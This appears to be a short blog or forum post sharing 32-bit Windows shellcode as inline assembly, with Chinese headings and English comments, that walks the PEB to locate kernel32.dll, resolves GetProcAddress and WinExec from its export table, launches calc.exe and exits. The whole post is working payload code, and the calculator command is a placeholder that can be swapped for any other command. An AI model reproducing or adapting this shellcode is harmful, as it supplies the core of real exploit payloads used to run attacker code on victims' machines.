【ShellCode】运行计算器的Shell Code,仅供参考
int main()
{
_asm
{
//寻找kernel32.dll的基地址
xor ecx, ecx;
mov eax, dword ptr fs : [ecx + 30h]; //EAX = PEB
mov eax, dword ptr[eax + 0Ch]; //EAX = PEB->Ldr
mov esi, dword ptr[eax + 14h]; //ESI = PEB->Ldr.InMemOrder
lods dword ptr[esi]; //EAX = Second module
xchg eax, esi; //EAX = ESI, ESI = EAX
lods dword ptr[esi]; //EAX = Third(kernel32)
mov ebx, dword ptr[eax + 10h]; //EBX = Base address
//查找kernel32.dll的导出表
mov edx, dword ptr[ebx + 3Ch]; //EDX = DOS->e_lfanew
add edx, ebx; //EDX = PE Header
mov edx, dword ptr[edx + 78h]; //EDX = Offset export table
add edx, ebx; //EDX = Export table
mov esi, dword ptr[edx + 20h]; //ESI = Offset names table
add esi, ebx; //ESI = Names table
xor ecx, ecx; //EXC = 0
//循环查找GetProcAddress函数
Get_Function:
inc ecx; //Increment the ordinal
lods dword ptr[esi]; //Get name offset
add eax, ebx; //Get function name
cmp dword ptr[eax], 50746547h; //GetProcAddress
jne Get_Function; //Get_Function
cmp dword ptr[eax + 4], 41636F72h; //rocAddress
jne Get_Function; //Get_Function
cmp dword ptr[eax + 8], 65726464h; //ddress
jne Get_Function; //Get_Function
//寻找GetProcAddress 函数
mov esi, dword ptr[edx + 24h]; //ESI = Offset ordinals
add esi, ebx; //ESI = Ordinals table
mov cx, word ptr[esi + ecx * 2]; //CX = Number of function
dec ecx
mov esi, dword ptr[edx + 1Ch]; //ESI = Offset address table
add esi, ebx; //ESI = Address table
mov edx, dword ptr[esi + ecx * 4]; //EDX = Pointer(offset)
add edx, ebx; //EDX = GetProcAddress
push ebx; //PUSH kernel32.Base address
push edx; //PUSH kernel32.GetProcAddress
//寻找WinExec函数地址
xor ecx, ecx; //ECX = 0
push ecx; //PUSH ECX
mov ecx, 61636578h; //string acex
push ecx; //PUSH ECX
sub dword ptr[esp + 3], 61h; //Remove "a" ESP = &0012FE18--->string xec
push 456E6957h; //string EniW
push esp; //PUSH ESP WinExec
push ebx; //PUSH EBX kernel32.Base address
call edx; //CALL GetProcAddress
add esp, 8; //ESP + 8
pop ecx; //ECX = 0
push eax; //PUSH EAX-- > kernel32.WinExec Addresss
//赋值命令行字符串
xor ecx, ecx; //ECX = 0
push ecx; //PUSH ECX
push 0x6578652E;
push 0x636C6163; //calc.exe
xor ebx, ebx; //EBX = 0
mov ebx, esp; //EBX = "calc.exe"
xor ecx, ecx; //ECX = 0
inc ecx; //EXC = 1
push ecx; //PUSH ECX = 1
push ebx; //PUSH EBX = "calc.exe"
call eax; //CALL WinExec
//堆栈平衡
add esp, 10h; //ESP + 50h
pop edx; //EDX = kernel32.GetProcAddress
pop ebx; //EBX = kernel32.Base Address
//退出程序
xor ecx, ecx; //ECX = 0
mov ecx, 61737365h; //string asse
push ecx; //PUSH ECX
sub dword ptr[esp + 3], 61h; //Remove "a"
push 636F7250h; //string; Proc
push 74697845h; //string; Exit
push esp; //string "ExitProcess"
push ebx; //kernel32.dll base address
call edx; //GetProcAddress(Exec)
xor ecx, ecx; //ECX = 0
push ecx; //Return code = 0
call eax; //ExitProcess
}
}